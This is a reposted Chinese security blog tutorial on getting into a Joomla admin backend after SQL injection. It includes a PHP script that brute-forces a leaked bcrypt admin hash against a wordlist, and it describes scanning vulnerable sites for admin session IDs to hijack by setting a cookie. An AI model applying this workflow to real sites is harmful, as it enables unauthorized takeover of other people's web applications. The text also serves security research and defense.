如何利用JoomlaSQL注入漏洞登录后台

admin 2021年12月7日10:12:20安全文章评论41 views1152字阅读3分50秒阅读模式

1. 破解密码
因为Joomla使用的是PHP的crypt函数生成的密码,所以爆破密码也得按照这个思路来进行,比如下面的脚本:
<?php
$file = fopen("/root/hacker/dict", "r") or exit("Unable to open file!"); #指定字典路径
$num = 1;
while(!feof($file))
{
$cpwd = fgets($file);
$epwd = '$2y$10$gwsVA7DcL6rSgApkhsGoQeBH9Qfmg7Uqf3MXK9JYcvYyR06hkAJze'; #指定获取的哈希密码
echo $num.':'.$cpwd;
$result = crypt(trim($cpwd),$epwd);
if($result == $epwd)
{
echo "[+]Password Found!Clear password:".$cpwd."n";
break;
}
$num ++;
}
fclose($file);

首先利用http://zone.wooyun.org/content/23628中提到的脚本获取管理员的密码哈希,比 如:$2y$10$gwsVA7DcL6rSgApkhsGoQeBH9Qfmg7Uqf3MXK9JYcvYyR06hkAJze。然后可以配上获取到 的username和email社工组合密码字典或者利用各位小伙伴私藏的各种牛逼密码字典,爆破之。运气好的话,你会像我一样得到想要的明文密码:
如何利用JoomlaSQL注入漏洞登录后台

2. 利用获取的session_id登录
还是先跑脚本,获取到session_id,有的小伙伴肯定会问要是管理员千年不上线咋办,session_id很难获取到啊!我想说的是,你是白帽子肯定比我更有办法,这里我只是提一个简单的方法仅供参考。

搜索存在漏洞的站点,写个循环检测的脚本检测是否发现到session_id,一旦检出发出通知(比如:邮件),这样你就可以躺着睡觉,等待session_id的到来。

如何利用JoomlaSQL注入漏洞登录后台

拿到session_id后,访问网站后台,修改cookie带上你获取的session值,就这么轻松愉快的进入了后台了。

如何利用JoomlaSQL注入漏洞登录后台

如何利用JoomlaSQL注入漏洞登录后台


from:http://zone.wooyun.org/content/23660


小歪说:我之前把利用工具写出来,目的是方便做事,发到某平台是为了宣传heresec,有一些人,漏洞的原理不懂,工具都不知道怎么用,并不是对这样的人有什么看法,而是有浮躁的人,不会用不知道去研究原理,而是选择去装逼,这是让我难以理解的,如果我的公众号有这样的朋友,那么请取关,我希望我的公众号上面,都是热爱技术,无论多牛逼,都会虚心学习的人,做事踏踏实实的,希望能与各位朋友共勉。

本文始发于微信公众号(关注安全技术):如何利用JoomlaSQL注入漏洞登录后台

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月7日10:12:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  如何利用JoomlaSQL注入漏洞登录后台 http://cn-sec.com/archives/502904.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: